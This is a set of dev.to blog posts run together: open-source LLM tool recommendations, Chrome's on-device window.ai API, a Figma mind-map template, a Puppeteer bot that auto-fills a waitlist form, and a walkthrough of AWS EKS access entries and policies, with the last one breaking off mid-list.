engineer](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8zdpd1ndd7afnt8m4cvz.png) &nbsp; GPT-engineer lets you specify software in natural language, sit back, and watch as an AI writes and executes the code, and you can ask the AI to implement improvements. It's safe to say that it's an engineer who doesn't need a degree 😅 It's a commercial project for the automatic generation of web apps. It features a UI for non-technical users connected to a git-controlled codebase. I know this feels confusing, so watch the below demo to understand how you can use GPT Engineer. ![demo gif](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4lpk4ctcuypzr7ms2pii.gif) You can get started by installing the stable release using this command. ``` python -m pip install gpt-engineer ``` By default, gpt-engineer expects text input via a prompt file. It can also accept image inputs for vision-capable models. This can be useful for adding UX or architecture diagrams as additional context for GPT engineer. Read about all the [awesome features](https://github.com/gpt-engineer-org/gpt-engineer?tab=readme-ov-file#features). If you want a complete walkthrough, watch this awesome demo by David! {% embed https://www.youtube.com/watch?v=gWy-pJ2ofEM %} I recommend checking out the [roadmap](https://github.com/gpt-engineer-org/gpt-engineer/blob/main/ROADMAP.md) to understand the overall vision. ![roadmap](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v6vhrqgn8brw8woklvm0.png) They have 51k+ stars on GitHub and are on the `v0.3` release. {% cta https://github.com/gpt-engineer-org/gpt-engineer %} Star GPT Engineer ⭐️ {% endcta %} --- ## 19. [Dalai](https://github.com/cocktailpeanut/dalai) - the simplest way to run LLaMA and Alpaca locally. ![dalai](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hthbzdoar9s2li6kepgp.png) &nbsp; Dalai lets you run LLaMA and Alpaca on your computerP and is powered by `llama.cpp`, `llama-dl CDN`, and `alpaca.cpp`. Dalai runs on operating systems such as Linux, Mac, and Windows so that's a plus point! ![gif demo](https://github.com/cocktailpeanut/dalai/raw/main/docs/alpaca.gif) Dalai is also an NPM package: - programmatically install - locally make requests to the model - run a dalai server (powered by socket.io) - programmatically make requests to a remote dalai server (via socket.io) You can install the package using the below npm command. ``` npm install dalai ``` ![latest package](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/27mx3wt2l025oxtzzz6p.png) You can read the [memory requirements](https://github.com/cocktailpeanut/dalai?tab=readme-ov-file#2-memory-requirements) and [how to archive elsewhere](https://github.com/cocktailpeanut/dalai?tab=readme-ov-file#using-a-different-home-folder) rather than home directory. They have 13k stars on GitHub and are still in the very early stages. {% cta https://github.com/cocktailpeanut/dalai %} Star Dalai ⭐️ {% endcta %} --- ## 20. [OpenLLM](https://github.com/bentoml/OpenLLM) - run LLMs as OpenAI compatible API endpoint in the cloud ![open llm](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jf3fjhw0bqxyletw847q.png) &nbsp; OpenLLM lets developers run any open-source LLMs as OpenAI-compatible API endpoints with a single command. ⚡ Build for fast and production usage. ⚡ Support llama3, qwen2, gemma, etc, and many quantized versions full list. ⚡ OpenAI-compatible API & includes ChatGPT like UI. ⚡ Accelerated LLM decoding with state-of-the-art inference backends. ⚡ Ready for enterprise-grade cloud deployment (Kubernetes, Docker, and BentoCloud). Get started with the following command. ```npm pip install openllm # or pip3 install openllm openllm hello ``` OpenLLM provides a chat user interface (UI) at the /chat endpoint for an LLM server. You can visit the chat UI at `http://localhost:3000/chat` and start different conversations with the model. ![open llm](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wgbyum3mgy51q46njf0q.png) OpenLLM supports LLM cloud deployment via BentoML, the unified model serving framework, and BentoCloud, an AI inference platform for enterprise AI teams. ![models](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mdlikmcik2dq746qha3b.png) If you don't know, BentoCloud provides a fully managed infrastructure optimized for LLM inference with autoscaling, model orchestration, observability, and many more, allowing you to run any AI model in the cloud. ![bento cloud console](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rmhtm95h90h6z2ei9e8b.png) <figcaption>Once the deployment is complete, you can run model inference on the BentoCloud console:</figcaption> You can read about the [supported models](https://github.com/bentoml/OpenLLM?tab=readme-ov-file#supported-models) and how to [start the LLM server](https://github.com/bentoml/OpenLLM?tab=readme-ov-file#start-an-llm-server). Explore docs as you can also chat with a model in the CLI using `openllm run` and specifying model version - `openllm run llama3:8b`. For people like me who love exploring walkthroughs, watch this demo by Matthew! {% embed https://www.youtube.com/watch?v=8nZZ2oQhx4E&pp=ygUIb3BlbiBsbG0%3D %} They have 9k+ stars on GitHub and have 100+ releases so it's growing at a rapid pace. {% cta https://github.com/bentoml/OpenLLM %} Star OpenLLM ⭐️ {% endcta %} --- ## 21. [Unsloth](https://github.com/unslothai/unsloth) - Finetune Llama 3, Mistral, Phi & Gemma LLMs 2-5x faster with 80% less memory. ![unsloth](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3eoe4v0miesybe1p9n0e.png) &nbsp; Unsloth makes finetuning large language models like Llama-3, Mistral, Phi-3, and Gemma 2x faster, use 70% less memory, and with no degradation in accuracy! > ✅ What is finetuning? If we want a language model to learn a new skill, a new language, some new programming language, or simply want the language model to learn how to follow and answer instructions like how ChatGPT functions, we do finetuning! Finetuning is the process of updating the actual `brains` of the language model through some process called back-propagation. But, finetuning can get very slow and very resource intensive. &nbsp; Unsloth can be installed locally or through another GPU service like Google Colab. Most use Unsloth through the interface Google Colab which provides a [free GPU](https://github.com/unslothai/unsloth?tab=readme-ov-file#-finetune-for-free) to train with. ![Finetune for Free](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6mnntbvbcho8hmihd59j.png) Some of the things that stand out: ✅ Open source trains 5x faster, and the pro version claims to be 30x faster. ✅ No approximation methods are used resulting in a 0% loss in accuracy. ✅ No change of hardware, Works on Linux and Windows via WSL. ![unsloth model stats](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0147naadascce5oztcwf.png) You can read the [installation instructions](https://github.com/unslothai/unsloth?tab=readme-ov-file#-installation-instructions) and [performance benchmarking tables](https://unsloth.ai/blog/mistral-benchmark#Benchmark%20tables) on the website. ![unsloth](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qm9hb9k6rqt8i1xr3re1.png) You can read the [docs](https://docs.unsloth.ai/) and all the [uploaded models on Hugging Face](https://huggingface.co/unsloth) directly. They have also provided a detailed guide on [How to Finetune Llama-3 and Export to Ollama](https://docs.unsloth.ai/tutorials/how-to-finetune-llama-3-and-export-to-ollama). They have 12.5k+ stars on GitHub and it's an efficient solution. {% cta https://github.com/unslothai/unsloth %} Star Unsloth ⭐️ {% endcta %} --- I hope you learned something new! I believe that learning to use these powerful LLM is a choice and it's on you (as a developer) to find better productivity solutions for your use case. Have a great day! Till next time. | If you like this kind of stuff, <br /> please follow me for more :) | <a href="https://twitter.com/Anmol_Codes"><img src="https://img.shields.io/badge/Twitter-d5d5d5?style=for-the-badge&logo=x&logoColor=0A0209" alt="profile of Twitter with username Anmol_Codes" ></a> <a href="https://github.com/Anmol-Baranwal"><img src="https://img.shields.io/badge/github-181717?style=for-the-badge&logo=github&logoColor=white" alt="profile of GitHub with username Anmol-Baranwal" ></a> <a href="https://www.linkedin.com/in/Anmol-Baranwal/"><img src="https://img.shields.io/badge/LinkedIn-0A66C2?style=for-the-badge&logo=linkedin&logoColor=white" alt="profile of LinkedIn with username Anmol-Baranwal" /></a> | |------------|----------| Follow Latitude for more content like this. {% embed https://dev.to/latitude %}
anmolbaranwal
1,916,215
Next-Level Web Applications with On-Device Generative AI: A Look at Google Chrome's Built-In Gemini Nano LLM
Web development is on the brink of a significant transformation with Google Chrome Canary's latest...
0
2024-07-13T18:34:18
https://dev.to/ptvty/next-level-web-applications-with-on-device-generative-ai-a-look-at-google-chromes-built-in-gemini-nano-llm-4bng
webdev, ai, javascript, a11y
Web development is on the brink of a significant transformation with Google Chrome Canary's latest experimental feature, a new tool called the `window.ai` API, allowing websites to harness the power of on-device generative AI. With Google’s Gemini Nano AI model built into the browser, websites can offer smarter, more personalized experiences directly on the user's device. Let's dive into what this means and how you can use it to supercharge your web applications. ## Meet Gemini Nano Gemini Nano is a compact yet powerful AI model from Google. It is the same model used in some Google Pixel phones for offline AI features. Its small size and impressive capabilities make it perfect for on-device applications, ensuring users benefit from advanced AI without needing to be online. ## What is the `window.ai` API? Google Chrome Canary consistently introduces exciting new features for developers, and the `window.ai` API is no exception. This API enables your website's JavaScript code to interact directly with Gemini Nano, a model that operates on the user's device. This means all AI tasks are performed locally using the computer’s GPU, ensuring no data is sent over the internet. This approach significantly enhances privacy and allows for offline functionality. ## How to Use the `window.ai` API Getting started with the `window.ai` API is straightforward. Here’s how you can integrate it into your website: 1. **Install [Google Chrome Canary](https://www.google.com/chrome/canary/)**: Ensure you have the latest version of Google Chrome Canary installed. 2. **Enable the Experimental Feature**: Follow the [instructions](https://github.com/lightning-joyce/chromeai/blob/main/README.md#how-to-set-up-built-in-gemini-nano-in-chrome) to enable the `window.ai` experimental feature. 3. **Check for API Availability**: In your code, verify that `window.ai` is defined to ensure the Local AI API is available in the user’s browser. 4. **Start Sending Prompts**: Once you know the API is available, you can begin sending prompts to Gemini Nano and receive responses using `ai.createTextSession()` and `session.prompt()` APIs. 5. **Utilize the AI's Response**: Use the AI's response in various ways, such as displaying it to the user, updating your UI, or for more complex processing. ```javascript if (window.ai) { logOceanPoem(); } else { console.log("The window.ai API is not available on this browser."); } async function logOceanPoem(prompt) { try { const session = await ai.createTextSession({ temperature: 0, topK: 1 }); const poem = await session.prompt("Write a poem about the ocean."); console.log(poem); } catch (error) { console.error("Error generating text:", error); } } // => ' In the realm of vast and boundless blue, // Where secrets hide and mysteries brew, // There lies a realm of ...' ``` ## Some Exciting Use Cases The possibilities with on-device generative AI are endless. Here are a few exciting ways you can use it: ### Privacy-Focused Apps Use local AI for sensitive applications like health, finance, or where strict data protection policies are required, ensuring complete privacy and data security. ### Offline-First PWAs Enhance chatbots and virtual assistants with more natural and responsive interactions, even when offline. ### Enhanced User Inputs Create smart user interfaces by integrating AI into the existing form components. For example, a select box can suggest the most relevant options if a user types an invalid option, rather than just displaying "Not found." ```javascript // The user tries to type in "android developer" in a searchable select box to fill his occupation, not knowing the granularity of the available options await session.prompt(`which are the 3 closest phrases to "android" from the following phrases: 1. DevOps Engineer 2. SEO specialist 3. Dentist 4. Cashier 5. Mobile Developer 6. Web Developer 7. Carpenter 8. Desktop Developer`); // => ' The three closest phrases to "Android" from the given phrases are: 1. Mobile Developer 2. Web Developer' ``` ### Assisted Writing Enhance text areas with AI writing assistance, allowing text summarization and rephrasing without sending user data to external servers. ```javascript await session.prompt(`Rephrase this sentence: Facebook suggested your profile, I looked at your profile and I found your story inspiring.`); // => ' Facebook displayed your profile to me, and upon reviewing it, I found your story to be incredibly inspiring.' ``` ### Accessibility and Improved Website Navigation Create user interfaces that people with disabilities can use more comfortably. For example, a prompt box can intelligently recommend the most relevant actions, pages, sub-menus, and settings based on users' intent. LLMs can easily understands different words that users might use to express the same idea. ```javascript const choices = ['Like post', 'Save post', 'Share post', 'Block user', 'Follow user']; await session.prompt(`Which choice is the most relevent to "I do not want to see any posts from this user again!": ${choices.map((choice, idx) => `${idx + 1}. ${choice}\n`)} `) // => ' The most relevant choice to the command "I do not want to see any posts from this user again!" is **"Block user"**.' ``` ```javascript await session.prompt(`Which choice is the most relevent to "I want to see future posts from this user!": ${choices.map((choice, idx) => `${idx + 1}. ${choice}\n`)} `) // => ' The most relevant choice is **5: Follow user.**' ``` ### Improved Text Search ```javascript // When a "Find in page" fails to find an exact match, try to search for similar words! await session.prompt(`Generate 10 words similar to "battery runtime", in the context of "smart phones"`); // => '1. Battery life 2. Battery endurance 3. Battery longevity 4. Battery capacity 5. Battery duration 6. Battery power 7. Battery energy 8. Battery performance 9. Battery efficiency 10. Battery usage' ``` ### Chat With Your Data Although the Gemini Nano is not the best model for factual reasoning, it can handle basic questions. For example, it can allow users to ask questions about the data in a table. ```javascript await session.prompt(`Who is the tallest person in the following list: 1. Alice, Weight: 52 kg, Height: 169 cm. 2. Bob, Weight: 71 kg, Height: 174 cm. 3. Eve, Weight: 66 kg, Height: 172 cm. `); // => 'The tallest person in the list is Bob, who weighs 71 kg and is 174 cm tall.' ``` ## Tips for Prompt Engineering To get the best results from the AI, follow these prompt engineering tips: - **Play with Parameters**: For factual questions, set the temperature to 0, and set TopK to 1 for more predictable and accurate answers. - **Use Line Breaks**: Keep related data on the same line to maintain context. - **Use Parentheses**: Add elaborations and clarifications in parentheses to vague words and phrases. - **Main Question First**: Put the main question at the beginning of the prompt, followed by related data. - **Response Parsing**: The model usually uses Markdown to format its response. Use this to your benefit. For example, if you're looking for a few keywords but the response is long, just take the bold words (inside double asterisks). ## Why On-Device AI is Awesome - **Privacy and Security**: All data stays on the user's device, enhancing privacy and reducing the risk of data breaches. - **Offline Functionality**: Apps work seamlessly without an internet connection, providing uninterrupted service. - **Better Performance**: Using the device's GPU can lead to faster response times and a more responsive application. - **Cost Savings**: Less reliance on cloud-based services can lower your operational costs. ## Things to Keep in Mind While the `window.ai` API is fantastic, there are a few things to consider: - **Device Compatibility**: Currently, this feature is exclusive to Google Chrome Canary. Ensure compatibility with other browsers and devices that may not have a GPU available. - **Resource Use**: Running AI models can be heavy on resources, especially on lower-end hardware. - **Model Limits**: On-device models might not be as powerful as their cloud-based counterparts, so balance functionality accordingly. ## Conclusion The `window.ai` API in Google Chrome Canary introduces a groundbreaking tool that harnesses the capabilities of on-device generative AI for web development. By utilizing local computation, it can enhance privacy, performance, and user experience. While currently an experimental feature, the potential for wider adoption remains uncertain. Nonetheless, exploring its capabilities now can pave the way for developing smarter, more responsive, and secure web applications in the future.
ptvty
1,916,447
Get Creativity Free Figma Mind Map Template
Are you looking for a versatile and user-friendly tool to create mind maps? Look no further! Sarah...
0
2024-07-13T15:43:00
https://neattemplate.com/figma-templates/get-creativity-free-figma-mind-map-template
webdev, figma, ui, uidesign
Are you looking for a versatile and user-friendly tool to create mind maps? Look no further! Sarah Elizabeth has designed a free Figma mind map template that will help you organize your thoughts and ideas effectively. ### Why Use a Mind Map? Mind maps are a powerful visual tool that can enhance your brainstorming sessions, planning processes, and note-taking activities. They allow you to capture and connect ideas in a non-linear way, helping you see the bigger picture and uncover new insights. ![Figma Mind Map Template](https://neattemplate.com/wp-content/uploads/2024/04/Bubble-Map%F0%9F%92%AD-1-1024x743.png) ### Types of Mind Maps Sarah Elizabeth's template includes various types of mind maps to cater to different needs: - Bubble Map: This type of mind map uses bubbles or circles to represent ideas or concepts. It allows you to explore relationships and connections between different elements. - Double Bubble Map: Similar to a bubble map, a double bubble map enables you to compare and contrast two different ideas or concepts side by side. - Circle Map: A circle map is used to define a central idea or concept and brainstorm related ideas or attributes around it. - Tree Map: A tree map is a hierarchical mind map that organizes ideas or concepts in a tree-like structure. It helps you break down complex topics into subtopics and sub-subtopics. Whether you're a student, professional, or creative individual, these mind map templates will serve as a valuable resource in your work or personal projects. [Download](https://www.figma.com/community/file/904971547725159114)
faisalgg
1,916,479
How to Build a Javascript Booking Automation Bot
Introduction I was recently made aware of a waitlist opening up for a new service in my...
0
2024-07-13T20:45:02
https://dev.to/columk1/how-to-build-a-javascript-booking-automation-bot-32em
webdev, javascript, webscraping, automation
### Introduction I was recently made aware of a waitlist opening up for a new service in my local area. I thought it would be a nice exercise to automate the registration process and secure one of the first places on the list. #### Registration System The online form already existed as it was used to register for a number of different services. The provider announced that there would be a new option added to the form in the coming days. My plan was to watch the site for any changes. As soon as the new checkbox option appeared, my script would fill out the rest of the form with my details, check the new input and submit. Since the form was loaded with javascript, I would use a headless browser to monitor the page for changes using Puppeteer. I also decided to implement an SMS notification system using Twilio. This would notify me if there were any issues submitting the form. #### Plan 1. Load the target web page in a headless browser. 2. Check if there are more checkboxes on the page than before. 3. If not, repeat steps 1 and 2. 4. If so, open a browser window, fill out and submit the form. 5. Send an SMS notification. ### Let's Begin #### Step 1. Initialize Local Project Create a new folder and then navigate to it and run the following commands from the terminal: ```npm init npm i puppeteer touch index.js``` #### Step 2. Create Browser Instance Create a headless browser instance using Puppeteer to check the target web page. ```js const URL = <TargetURL> const headlessBrowser = await puppeteer.launch({ headless: true }) const headlessPage = await headlessBrowser.newPage() await headlessPage.goto(URL) ``` #### Step 3. Check for Updates Develop a function to check the page for the expected condition. There are many different ways to compare pages. I checked if there was a new checkbox on the page using CSS selectors. The function returns true if the number of checkboxes on the page is greater than the number provided as an argument. You could also check the text of the page for diffs or use regex to search for matches. ```js async function hasAdditionalCheckbox(initialCount) { await headlessPage.reload({ waitUntil: 'load', }) const checkboxCount = await headlessPage.evaluate(() => { return document.querySelectorAll("input[type='checkbox']").length }) return checkboxCount > initialCount } ``` By setting `waitUntil` to "load", we instruct Puppeteer to wait for the load event of the page to be fired before proceeding. This means Puppeteer will ensure that all resources, including scripts, stylesheets, and images, have been fully loaded before moving on to the next line of code where we select form elements. > If you don't need to access javascript elements it is much easier, as you can simply use Node's native `fetch` method to grab the HTML of a page or to fetch a response from an API. In that case Puppeteer is overkill for this function. #### Step 4. Create a function to autofill and submit the form. This will fill out the form using a combination of Puppeteer's page interaction APIs and regular CSS selectors. The `click` and `type` functions are self-explanatory. The `evaluate` function takes a callback which allows you to run javascript inside of the page. ```js function autofillForm() { const browser = await puppeteer.launch({ headless: false }) const page = await browser.newPage() await page.goto(URL, { waitUntil: 'load', }) await page.type('#date-picker', '22/07/1989') await page.click('#radio-button-2') await page.type('#name', 'John Doe') await page.type('#email', 'johndoe@gmail.com') await page.evaluate(() => { const checkboxes = document.querySelectorAll('input[type="checkbox"') checkboxes.forEach((checkbox) => { const label = checkbox.previousElementSibling if (label.innerText.includes(<expectedText>)) { checkbox.checked = true } }) }) await page.click('#submit-btn') } ``` I created a new browser instance using the options argument `headless: false` in this function because I wanted to see the confirmation of my form submission on my screen. It would also have been fine to use the existing headless instance and then parse the result of the form submission in Node. #### Step 5. Set up SMS notifications with Twilio. You may want to be notified when your conditional is triggered. In my case, this was to check if the form had been submitted correctly. Another use-case would be if your form requires manual completion of a captcha or entry of sensitive billing information. Go to https://www.twilio.com/ and create a new account. Once you have verified your phone number, go to the console and navigate to the messages section. You should see a heading titled "Send your First SMS" with some code snippets below. Click the Node.js tab and copy the code snippet provided. > This will include your API keys but it's fine since we'll be running the app locally. If you are hosting your script in a public repo or sharing it you should place these in an environmental variable. In your project directory, run `npm i twilio` Create a new async function called `sendSMS` and paste in the snippet from Twilio. It should look something like this: ```js async function sendSMS() { const accountSid = process.env.ACCOUNT_SID const authToken = process.env.AUTH_TOKEN const client = twilio(accountSid, authToken) const message = await client.messages.create({ body: 'Waitlist is open!', from: '<yourTwilioPhoneNumber', to: '<yourPhoneNumber>', }) } ``` You can also trigger an email or a phone call if preferred. #### Step 6. Putting it All Together Now we can put everything in an interval: ```js const waitlistScraper = setInterval(async () => { const isWaitlistOpen = await hasAdditionalCheckbox(3) if (isWaitlistOpen) { autoFillForm() sendSMS() clearInterval(waitlistScraper) } }, 5000) // 5 seconds ``` And we're done! Use the command `node index.js` when you are ready to run the application. You may need to adjust your machine's sleep settings to ensure that the script stays running. Mac users can use the command `caffeinate` to achieve this. ### Conclusion This project demonstrates the flexibility of automation through web scraping and browser control. Such techniques can be applied to various scenarios, making it a valuable skill in web development. Whether you're booking tickets, monitoring product availability, or gathering data, these skills can greatly enhance your productivity. Plus, they're fun little projects, especially when they save you from staying up all night refreshing a page!
columk1
1,916,532
AWS: Kubernetes and Access Management API, the new authentication in EKS
Another cool feature that Amazon showed back at the last re:Invent in November 2023 is changes in...
0
2024-07-13T09:48:39
https://rtfm.co.ua/en/aws-kubernetes-and-access-management-api-the-new-authentification-in-eks/
security, kubernetes, aws, devops
--- title: AWS: Kubernetes and Access Management API, the new authentication in EKS published: true date: 2024-07-08 22:17:16 UTC tags: security,kubernetes,aws,devops canonical_url: https://rtfm.co.ua/en/aws-kubernetes-and-access-management-api-the-new-authentification-in-eks/ --- ![](https://cdn-images-1.medium.com/max/1024/1*JZAYCCIy6Muaxtz2FKpu0w.png) Another cool feature that Amazon showed back at the last re:Invent in November 2023 is changes in how AWS Elastic Kubernetes Service authenticates and authorizes users. And this applies not only to the cluster’s users, but also to its WorkerNodes. I mean, it’s not really a new scheme (November 2023) — but I just now got around to upgrading the cluster from 1.28 to 1.30, and at the same time I will update the version of the [`terraform-aws-modules/eks`](https://registry.terraform.io/modules/terraform-aws-modules/eks/aws/latest) with the EKS Access Management API changes, as we are currently on version 19 and the changes were added in version 20 (see [v20.0.0 Release notes](https://github.com/terraform-aws-modules/terraform-aws-eks/releases/tag/v20.0.0)). We will probably talk about Terraform in the next post, but today let’s see how the new system works and what it allows us to do. And knowing this, will go to the Terraform, and will think about how to organize work with IAM, considering the changes in the EKS Access Management API and [EKS Pod Identities](https://rtfm.co.ua/en/aws-eks-pod-identities-a-replacement-for-irsa-simplifying-iam-access-management/). In general, you can still see old posts on authentication/authorization in Kubernetes: - [Kubernetes: part 4 — AWS EKS authentication, aws-iam-authenticator and AWS IAM](https://rtfm.co.ua/en/kubernetes-part-4-aws-eks-authentification-aws-iam-authenticator-and-aws-iam/) - [AWS Elastic Kubernetes Service: RBAC Authorization via AWS IAM and RBAC Groups](https://rtfm.co.ua/en/aws-elastic-kubernetes-service-rbac-authorization-via-aws-iam-and-rbac-groups/) - [AWS: EKS, OpenID Connect, and ServiceAccounts](https://rtfm.co.ua/en/aws-eks-openid-connect-and-serviceaccounts/) ### How does it work? Previously, we had a special `aws-auth` ConfigMap that described WorkerNodes IAM Roles, all our users, roles, and groups. From now on, we can manage access to EKS directly through the EKS API using AWS IAM as an authenticator. That is, the user logs in to AWS, AWS performs authentication — checks that it is the user he or she claims to be, and then, when the user connects to Kubernetes, the Kubernetes cluser performs authorization — checking permissions to the cluster, and in the cluster itself. At the same time, this scheme works perfectly with Kubernetes’ RBAC. And another significant detail is that we can finally get rid of the “default root user” — the hidden cluster administrator on whose behalf it was created. And before, we couldn’t see or change it anywhere, which sometimes caused problems. So, if earlier we had to manage the entries in the `aws-auth` ConfigMap ourselves, and God forbid it should be broken (that happened to me a few times), now we can move access control to a dedicated Terraform code, and access control is much easier and less risky. ### Changes in IAM and EKS Now we have two new entities in EKS —  **_Access entries_** and **_Access policies_** : - **Amazon EKS Access Entries**  — an entry in EKS about an object that is associated with an AWS IAM role or user  — describes the type (a regular user, EC2, etc.), Kubernetes RBAC Groups, or EKS Access Policy - **Amazon EKS Access Policy**  — a policy in EKS that describes the permissions for EKS Access Entries. And these are EKS policies — you won’t find them in IAM. Currently, there are 4 EKS Access Policies that we can use, and they are similar to the default ones [User-facing ClusterRoles в Kubernetes](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles) : - `AmazonEKSClusterAdminPolicy` - cluster-admin - `AmazonEKSAdminPolicy` - admin - `AmazonEKSEditPolicy` - edit - `AmazonEKSViewPolicy` - view I guess that somewhere under the hood, these EKS Access Policies are simply mapped to Kubernetes ClusterRoles. We connect these policies to the IAM Role or IAM user, and when connecting to the Kubernetes cluster, EKS Authorizer checks which permissions this user has. Schematically, this can be represented as follows: ![](https://cdn-images-1.medium.com/max/1024/0*Y0wmaLoiZK62AQn7.png) Or this scheme, from the [AWS A deep dive into simplified Amazon EKS access management controls](https://aws.amazon.com/blogs/containers/a-deep-dive-into-simplified-amazon-eks-access-management-controls/) blog: ![](https://cdn-images-1.medium.com/max/879/0*tY6hc50SsjweFUte.png) Instead of the default AWS managed IAM Policy, when creating an EKS Access Policy, we can specify a name of a Kubernetes RBAC Group, and then the Kubernetes RBAC mechanism will be used instead of the EKS Authorizer — we’ll see how it works is this post. For Terraform, in the [`terraform-provider-aws`](https://github.com/hashicorp/terraform-provider-aws/tree/v5.33.0) version 5.33.0 were added two new corresponding resource types — `aws_eks_access_entry` and `aws_eks_access_policy_association`. But now we will do everything manually. ### Configuring the Cluster access management API We will check how it works on an existing cluster version 1.28. Open the cluster settings, the Access tab, click on the Manage access button: ![](https://cdn-images-1.medium.com/max/1024/0*7p9Ueq4Bn523LReB.png) Here, we have the _ConfigMap_ enabled (the aws-auth) - change it to _EKS API and ConfigMap._ This way we will keep the old mechanism and can test the new one (you can also do this in Terraform): ![](https://cdn-images-1.medium.com/max/655/0*U-M44uMjvbRznQ_U.png) Note the warning: “_Once you modify a cluster to use the EKS access entry API, you cannot change it back to ConfigMap only_”. But [`terraform-aws-modules/eks`](https://registry.terraform.io/modules/terraform-aws-modules/eks/aws/latest) version 19.21 ignores these changes and works fine, so you can change it here. Now, the cluster will authorize users from both `aws-auth` ConfigMap and EKS Access Entry API, with preference for the Access Entry API. After switching to the EKS Access Entry API, we immediately have new EKS Access Entries: ![](https://cdn-images-1.medium.com/max/1024/0*qTwDUYnyAWOYdiyT.png) And only now we can see the “hidden root user” mentioned above — the `assumed-role/tf-admin` in my case, because Terraform works by using that IAM role, and in my setup it was done exactly because of this AWS/EKS mechanism, which can now be removed. But not everything is taken from the current `aws-auth` ConfigMap: the role for WorkerNodes is there, but the rest of the entries (users from `mapUsers` and roles from `mapRoles`) are not automatically added. However, when you change the `API_AND_CONFIG_MAP` parameter through Terraform, it seems to happen - we'll check later. ### Adding a new IAM User to the EKS cluster You can check existing EKS Access Entries from the AWS CLI with the [`aws eks list-access-entries`](https://docs.aws.amazon.com/cli/latest/reference/eks/list-access-entries.html) command: ``` $ aws --profile work eks list-access-entries --cluster-name atlas-eks-test-1-28-cluster { "accessEntries": [ "arn:aws:iam::492***148:role/test-1-28-default-eks-node-group-20240702094849283200000002", "arn:aws:iam::492***148:role/tf-admin" ] } ``` Let’s add a new IAM User with access to the cluster. Create the user: ![](https://cdn-images-1.medium.com/max/624/0*8U9woRr3Lga1y_c3.png) In Set permissions, don’t select anything, just click Next: ![](https://cdn-images-1.medium.com/max/870/0*8rMPb7HhNAHkvLKa.png) Create an Access Key — we will use this user from the AWS CLI to generate the `kubectl` config: ![](https://cdn-images-1.medium.com/max/1024/0*5rpbWNvFe-wKCA5D.png) ![](https://cdn-images-1.medium.com/max/944/0*-uWexTwT3OGAZtX5.png) Add permission to `eks:DescribeCluster`: ![](https://cdn-images-1.medium.com/max/1024/0*QLf69wMmNj_7v0Qb.png) ``` { "Version": "2012-10-17", "Statement": [ { "Sid": "Statement1", "Effect": "Allow", "Action": ["eks:DescribeCluster"], "Resource": ["*"] } ] } ``` ![](https://cdn-images-1.medium.com/max/1024/0*N-t00sT6YbEPS1Am.png) Save and create a new AWS CLI profile: ``` $ vim -p ~/.aws/config ~/.aws/credentials ``` Add the profile to `~/.aws/config`: ``` [profile test-eks] region = us-east-1 output = json ``` And the keys to the `~/.aws/credentials`: ``` [test-eks] aws_access_key_id = AKI***IMN aws_secret_access_key = Kdh***7wP ``` Create a new `kubectl context`: ``` $ aws --profile test-eks eks update-kubeconfig --name atlas-eks-test-1-28-cluster --alias test-cluster-test-user Updated context test-cluster-test-user in /home/setevoy/.kube/config ``` We’re done with the IAM User, and now we need to connect it to the EKS cluster. ### EKS: adding an Access Entry We can do it either through the AWS Console: ![](https://cdn-images-1.medium.com/max/1024/0*9bh36vIK821HIXeV.png) Or with the AWS CLI (with a working profile, not a new one, because it has no rights) and the [`aws eks create-access-entry`](https://docs.aws.amazon.com/cli/latest/reference/eks/create-access-entry.html) command. In the parameters, pass the cluster name and the ARN of the IAM User or IAM Role that we are connecting to the cluster (but it would probably be more correct to say “_for which we are creating an entry point to the cluster_”, because the entity is called _Access Entry_): ``` $ aws --profile work eks create-access-entry --cluster-name atlas-eks-test-1-28-cluster --principal-arn arn:aws:iam::492***148:user/test-eks-acess-TO-DEL { "accessEntry": { "clusterName": "atlas-eks-test-1-28-cluster", "principalArn": "arn:aws:iam::492***148:user/test-eks-acess-TO-DEL", "kubernetesGroups": [], "accessEntryArn": "arn:aws:eks:us-east-1:492 ***148:access-entry/atlas-eks-test-1-28-cluster/user/492*** 148/test-eks-acess-TO-DEL/98c8398d-9494-c9f3-2bfc-86e07086c655", ... "username": "arn:aws:iam::492***148:user/test-eks-acess-TO-DEL", "type": "STANDARD" } } ``` Let’s take another look at the AWS Console: ![](https://cdn-images-1.medium.com/max/1024/0*q40plKHzc70_cWgQ.png) A new Entry is added, moving on. ### Adding an EKS Access Policy Now we still don’t have access to the cluster with the new user, because there is no EKS Policy connected to it — the Access policies field is empty. Check with the `kubectl auth can-i`: ``` $ kubectl auth can-i get pod no ``` You can add an EKS Access Policy in the AWS Console: ![](https://cdn-images-1.medium.com/max/1024/0*iJ0Lqo0u8tpt-qrr.png) Or again, with the AWS CLI and the [`aws eks associate-access-policy`](https://docs.aws.amazon.com/cli/latest/reference/eks/associate-access-policy.html) command. Let’s add the `AmazonEKSViewPolicy` for now: ``` $ aws --profile work eks associate-access-policy --cluster-name atlas-eks-test-1-28-cluster \ > --principal-arn arn:aws:iam::492***148:user/test-eks-acess-TO-DEL \ > --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSViewPolicy \ > --access-scope type=cluster { "clusterName": "atlas-eks-test-1-28-cluster", "principalArn": "arn:aws:iam::492***148:user/test-eks-acess-TO-DEL", "associatedAccessPolicy": { "policyArn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSViewPolicy", "accessScope": { "type": "cluster", "namespaces": [] }, ... } ``` Pay attention to the `--access-scope type=cluster` - now we have granted the ReadOnly rights to the entire cluster, but we can limit it to a specific namespace(s), will try it later in this post. Check the Policies in the AWS Console: ![](https://cdn-images-1.medium.com/max/750/0*-U-neU6ahCzwDfI8.png) The Access Policy is added Check with the `kubectl`: ``` $ kubectl auth can-i get pod yes ``` But we can’t create a Kubernetes Pod because we have ReadOnly rights: ``` $ kubectl auth can-i create pod no ``` Other useful commands for the AWS CLI: - [`aws eks 